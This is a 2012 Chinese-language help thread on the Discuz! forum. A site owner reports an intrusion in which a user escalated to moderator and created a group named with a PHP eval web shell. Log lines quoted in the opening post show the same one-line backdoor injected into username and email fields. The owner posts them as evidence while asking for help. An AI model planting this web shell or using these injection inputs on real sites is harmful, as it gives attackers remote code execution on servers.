Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

<?php @eval($_POST[cmd])?>,注入风险,求帮助

[复制链接]
蒋奉杉 发表于 2012-12-8 21:27:55 | 显示全部楼层 |阅读模式
新安装的,程序没几天,发现网站有一个注册用户,他直接提升自己为实习版主了,用户组中,同时也多了一个,用如下代码,做名称的组,<?php @eval($_POST[cmd])?>,同时,在服务器中,扫描,程序文件,发现,/data/log/201212_cplog.php
中,也存在,于这行代码相关的记录,
有很多,其中,部份如下:
<?PHP exit;?>        1354537724        admin        1        112.81.19.226        members        GET={operation=add; newusername=&lt;?php eval($_POST[cmd]);?&gt;; newpassword=123456; newemail=af@afd.com; newgroupid=10; }; POST={newusername=&lt;?php eval($_POST[cmd]);?&gt;; newpassword=123456; newemail=af@afd.com; newgroupid=10; };
<?PHP exit;?>        1354537751        admin        1        112.81.19.226        members        GET={operation=add; newusername=12‘&lt;?php eval($_POST[cmd]);?&gt;; newpassword=123456; newemail=af@afd.com; newgroupid=10; }; POST={newusername=12‘&lt;?php eval($_POST[cmd]);?&gt;; newpassword=123456; newemail=af@afd.com; newgroupid=10; };
<?PHP exit;?>        1354537761        admin        1        112.81.19.226        members        GET={operation=add; newusername=123; newpassword=123456; newemail=&lt;?php eval($_POST[cmd]);?&gt;; newgroupid=10; }; POST={newusername=123; newpassword=123456; newemail=&lt;?php eval($_POST[cmd]);?&gt;; newgroupid=10; };
<?PHP exit;?>        1354537771        admin        1        112.81.19.226        members        GET={operation=add; newusername=123; newpassword=123456; newemail=&lt;?php eval($_POST[cmd]);?&gt;@daf.com; newgroupid=10; }; POST={newusername=123; newpassword=123456; newemail=&lt;?php eval($_POST[cmd]);?&gt;@daf.com; newgroupid=10; };
<?PHP exit;?>        1354537780        admin        1        112.81.19.226        members        GET={operation=add; newusername=123; newpassword=123456; newemail='&lt;?php eval($_POST[cmd]);?&gt;1@daf.com; newgroupid=10; }; POST={newusername=123; newpassword=123456; newemail='&lt;?php eval($_POST[cmd]);?&gt;1@daf.com; newgroupid=10; };

求帮助!!!!!!!!

1017057078 发表于 2012-12-8 22:21:02 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复

使用道具 举报

pbdq 发表于 2012-12-9 11:09:18 | 显示全部楼层
这个是别人放木马。
回复

使用道具 举报

mark35 发表于 2012-12-9 17:36:01 | 显示全部楼层
被人利用转义漏洞注入攻击
回复

使用道具 举报

m.king 发表于 2012-12-10 11:43:53 | 显示全部楼层
问题已经收到,我们会看看是否是逻辑代码的问题。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-3-2 02:02 , Processed in 0.028996 second(s), 6 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表